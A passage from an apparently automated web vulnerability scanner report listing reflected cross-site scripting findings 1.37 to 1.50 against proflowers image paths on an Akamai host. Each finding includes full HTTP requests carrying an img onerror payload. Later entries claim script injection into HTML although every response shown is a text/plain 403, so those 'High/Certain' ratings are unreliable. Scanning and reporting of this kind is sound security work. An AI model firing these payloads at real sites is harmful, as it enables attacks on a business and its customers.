Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 99
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:51 GMT
Connection: close

Unable to find /ProvideCommerce/ROS12red50_rbye11_FV_PFc0749<img src=a onerror=alert(1)>3cf25d69d4b

1.37. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12swtexp40nogyp_dmsk10_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12swtexp40nogyp_dmsk10_PF

Issue detail

The value of REST URL parameter 9 is copied into the response body without encoding. The payload 65b0f<img%20src%3da%20onerror%3dalert(1)>a549e23adca was submitted in the REST URL parameter 9 and was echoed, URL-decoded, as 65b0f<img src=a onerror=alert(1)>a549e23adca in the application's response.

The proof-of-concept uses an <img> element whose onerror event handler would execute arbitrary JavaScript if the response were rendered as HTML. Note, however, that the response below is a 403 with Content-Type: text/plain and no X-Content-Type-Options: nosniff header: a browser that honours the declared type displays the reflected markup as text, and the handler fires only where the content is interpreted as HTML (for example in older browsers that sniff text/plain responses). Confirm the High/Certain rating manually before reporting this as exploitable cross-site scripting.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12swtexp40nogyp_dmsk10_PF65b0f<img%20src%3da%20onerror%3dalert(1)>a549e23adca?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 104
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:49:33 GMT
Connection: close

Unable to find /ProvideCommerce/ROS12swtexp40nogyp_dmsk10_PF65b0f<img src=a onerror=alert(1)>a549e23adca

1.38. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12swtexp40nogyp_rbye10_FC_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12swtexp40nogyp_rbye10_FC_PF

Issue detail

The value of REST URL parameter 9 is copied into the response body without encoding. The payload 9481e<img%20src%3da%20onerror%3dalert(1)>4b0ca80c893 was submitted in the REST URL parameter 9 and was echoed, URL-decoded, as 9481e<img src=a onerror=alert(1)>4b0ca80c893 in the application's response.

The proof-of-concept uses an <img> element whose onerror event handler would execute arbitrary JavaScript if the response were rendered as HTML. Note, however, that the response below is a 403 with Content-Type: text/plain and no X-Content-Type-Options: nosniff header: a browser that honours the declared type displays the reflected markup as text, and the handler fires only where the content is interpreted as HTML (for example in older browsers that sniff text/plain responses). Confirm the High/Certain rating manually before reporting this as exploitable cross-site scripting.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12swtexp40nogyp_rbye10_FC_PF9481e<img%20src%3da%20onerror%3dalert(1)>4b0ca80c893?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 107
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:55 GMT
Connection: close

Unable to find /ProvideCommerce/ROS12swtexp40nogyp_rbye10_FC_PF9481e<img src=a onerror=alert(1)>4b0ca80c893

1.39. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12white50_09_l [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12white50_09_l

Issue detail

The value of REST URL parameter 9 is copied into the response body without encoding. The payload 4673a<img%20src%3da%20onerror%3dalert(1)>c73a060d77c was submitted in the REST URL parameter 9 and was echoed, URL-decoded, as 4673a<img src=a onerror=alert(1)>c73a060d77c in the application's response.

The proof-of-concept uses an <img> element whose onerror event handler would execute arbitrary JavaScript if the response were rendered as HTML. Note, however, that the response below is a 403 with Content-Type: text/plain and no X-Content-Type-Options: nosniff header: a browser that honours the declared type displays the reflected markup as text, and the handler fires only where the content is interpreted as HTML (for example in older browsers that sniff text/plain responses). Confirm the High/Certain rating manually before reporting this as exploitable cross-site scripting.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12white50_09_l4673a<img%20src%3da%20onerror%3dalert(1)>c73a060d77c?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 93
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:33:01 GMT
Connection: close

Unable to find /ProvideCommerce/ROS12white50_09_l4673a<img src=a onerror=alert(1)>c73a060d77c

1.40. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS15assrtspray_rbye09_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS15assrtspray_rbye09_PF

Issue detail

The value of REST URL parameter 9 is copied into the response body without encoding. The payload 54cfb<img%20src%3da%20onerror%3dalert(1)>0456aff298b was submitted in the REST URL parameter 9 and was echoed, URL-decoded, as 54cfb<img src=a onerror=alert(1)>0456aff298b in the application's response.

The proof-of-concept uses an <img> element whose onerror event handler would execute arbitrary JavaScript if the response were rendered as HTML. Note, however, that the response below is a 403 with Content-Type: text/plain and no X-Content-Type-Options: nosniff header: a browser that honours the declared type displays the reflected markup as text, and the handler fires only where the content is interpreted as HTML (for example in older browsers that sniff text/plain responses). Confirm the High/Certain rating manually before reporting this as exploitable cross-site scripting.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS15assrtspray_rbye09_PF54cfb<img%20src%3da%20onerror%3dalert(1)>0456aff298b?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 101
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:49:33 GMT
Connection: close

Unable to find /ProvideCommerce/ROS15assrtspray_rbye09_PF54cfb<img src=a onerror=alert(1)>0456aff298b

1.41. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS18red40_gv11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS18red40_gv11_PF

Issue detail

The value of REST URL parameter 9 is copied into the response body without encoding. The payload c45fd<img%20src%3da%20onerror%3dalert(1)>becc4bb494f was submitted in the REST URL parameter 9 and was echoed, URL-decoded, as c45fd<img src=a onerror=alert(1)>becc4bb494f in the application's response.

The proof-of-concept uses an <img> element whose onerror event handler would execute arbitrary JavaScript if the response were rendered as HTML. Note, however, that the response below is a 403 with Content-Type: text/plain and no X-Content-Type-Options: nosniff header: a browser that honours the declared type displays the reflected markup as text, and the handler fires only where the content is interpreted as HTML (for example in older browsers that sniff text/plain responses). Confirm the High/Certain rating manually before reporting this as exploitable cross-site scripting.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS18red40_gv11_PFc45fd<img%20src%3da%20onerror%3dalert(1)>becc4bb494f?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 94
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:56 GMT
Connection: close

Unable to find /ProvideCommerce/ROS18red40_gv11_PFc45fd<img src=a onerror=alert(1)>becc4bb494f

1.42. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24red40_rdtrmp09_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24red40_rdtrmp09_PF

Issue detail

The value of REST URL parameter 9 is copied into the response body without encoding. The payload 4e5f4<img%20src%3da%20onerror%3dalert(1)>757198edcc6 was submitted in the REST URL parameter 9 and was echoed, URL-decoded, as 4e5f4<img src=a onerror=alert(1)>757198edcc6 in the application's response.

The proof-of-concept uses an <img> element whose onerror event handler would execute arbitrary JavaScript if the response were rendered as HTML. Note, however, that the response below is a 403 with Content-Type: text/plain and no X-Content-Type-Options: nosniff header: a browser that honours the declared type displays the reflected markup as text, and the handler fires only where the content is interpreted as HTML (for example in older browsers that sniff text/plain responses). Confirm the High/Certain rating manually before reporting this as exploitable cross-site scripting.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24red40_rdtrmp09_PF4e5f4<img%20src%3da%20onerror%3dalert(1)>757198edcc6?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 98
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:51 GMT
Connection: close

Unable to find /ProvideCommerce/ROS24red40_rdtrmp09_PF4e5f4<img src=a onerror=alert(1)>757198edcc6

1.43. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24red50_rbye11_FRV_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24red50_rbye11_FRV_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 9397a<img%20src%3da%20onerror%3dalert(1)>6dfee76ddd was submitted in the REST URL parameter 9. This input was echoed as 9397a<img src=a onerror=alert(1)>6dfee76ddd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24red50_rbye11_FRV_PF9397a<img%20src%3da%20onerror%3dalert(1)>6dfee76ddd?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 99
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:51 GMT
Connection: close

Unable to find /ProvideCommerce/ROS24red50_rbye11_FRV_PF9397a<img src=a onerror=alert(1)>6dfee76ddd

1.44. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24red50_rbye11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24red50_rbye11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload f5af5<img%20src%3da%20onerror%3dalert(1)>6a39f0929c2 was submitted in the REST URL parameter 9. This input was echoed as f5af5<img src=a onerror=alert(1)>6a39f0929c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24red50_rbye11_PFf5af5<img%20src%3da%20onerror%3dalert(1)>6a39f0929c2?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=120&hei=140 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 96
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:49:34 GMT
Connection: close

Unable to find /ProvideCommerce/ROS24red50_rbye11_PFf5af5<img src=a onerror=alert(1)>6a39f0929c2

1.45. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS36Red50_rbyg11_FRG_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS36Red50_rbyg11_FRG_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 3f820<img%20src%3da%20onerror%3dalert(1)>765038f592b was submitted in the REST URL parameter 9. This input was echoed as 3f820<img src=a onerror=alert(1)>765038f592b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS36Red50_rbyg11_FRG_PF3f820<img%20src%3da%20onerror%3dalert(1)>765038f592b?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:51 GMT
Connection: close

Unable to find /ProvideCommerce/ROS36Red50_rbyg11_FRG_PF3f820<img src=a onerror=alert(1)>765038f592b

1.46. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS48assrtpet_gv09_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS48assrtpet_gv09_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload a2e58<img%20src%3da%20onerror%3dalert(1)>5024d153cf9 was submitted in the REST URL parameter 9. This input was echoed as a2e58<img src=a onerror=alert(1)>5024d153cf9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS48assrtpet_gv09_PFa2e58<img%20src%3da%20onerror%3dalert(1)>5024d153cf9?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 97
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:54 GMT
Connection: close

Unable to find /ProvideCommerce/ROS48assrtpet_gv09_PFa2e58<img src=a onerror=alert(1)>5024d153cf9

1.47. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS_PAS_dynamite40_10_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS_PAS_dynamite40_10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 5a67f<img%20src%3da%20onerror%3dalert(1)>9bcc720745 was submitted in the REST URL parameter 9. This input was echoed as 5a67f<img src=a onerror=alert(1)>9bcc720745 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS_PAS_dynamite40_10_PF5a67f<img%20src%3da%20onerror%3dalert(1)>9bcc720745?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 99
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:57 GMT
Connection: close

Unable to find /ProvideCommerce/ROS_PAS_dynamite40_10_PF5a67f<img src=a onerror=alert(1)>9bcc720745

1.48. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/RubyVase_tn [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/RubyVase_tn

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload c866d<img%20src%3da%20onerror%3dalert(1)>154ac83e716 was submitted in the REST URL parameter 9. This input was echoed as c866d<img src=a onerror=alert(1)>154ac83e716 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/RubyVase_tnc866d<img%20src%3da%20onerror%3dalert(1)>154ac83e716?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&hei=73 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/18-Red-Roses-30050119?viewpos=2&trackingpgroup=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 87
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:35:07 GMT
Connection: close

Unable to find /ProvideCommerce/RubyVase_tnc866d<img src=a onerror=alert(1)>154ac83e716

1.49. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CXNLOVECUD11_GvnLoveCud_EDY_11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CXNLOVECUD11_GvnLoveCud_EDY_11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 5603a<img%20src%3da%20onerror%3dalert(1)>7a612d79cef was submitted in the REST URL parameter 9. This input was echoed as 5603a<img src=a onerror=alert(1)>7a612d79cef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CXNLOVECUD11_GvnLoveCud_EDY_11_PF5603a<img%20src%3da%20onerror%3dalert(1)>7a612d79cef?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 113
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:33:02 GMT
Connection: close

Unable to find /ProvideCommerce/SNK_CXNLOVECUD11_GvnLoveCud_EDY_11_PF5603a<img src=a onerror=alert(1)>7a612d79cef

1.50. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL15swthrt_gv09_2_FC_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL15swthrt_gv09_2_FC_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 9c7cf<img%20src%3da%20onerror%3dalert(1)>fc11b4a6f5d was submitted in the REST URL parameter 9. This input was echoed as 9c7cf<img src=a onerror=alert(1)>fc11b4a6f5d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL15swthrt_gv09_2_FC_PF9c7cf<img%20src%3da%20onerror%3dalert(1)>fc11b4a6f5d?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:55 GMT
Connection: close

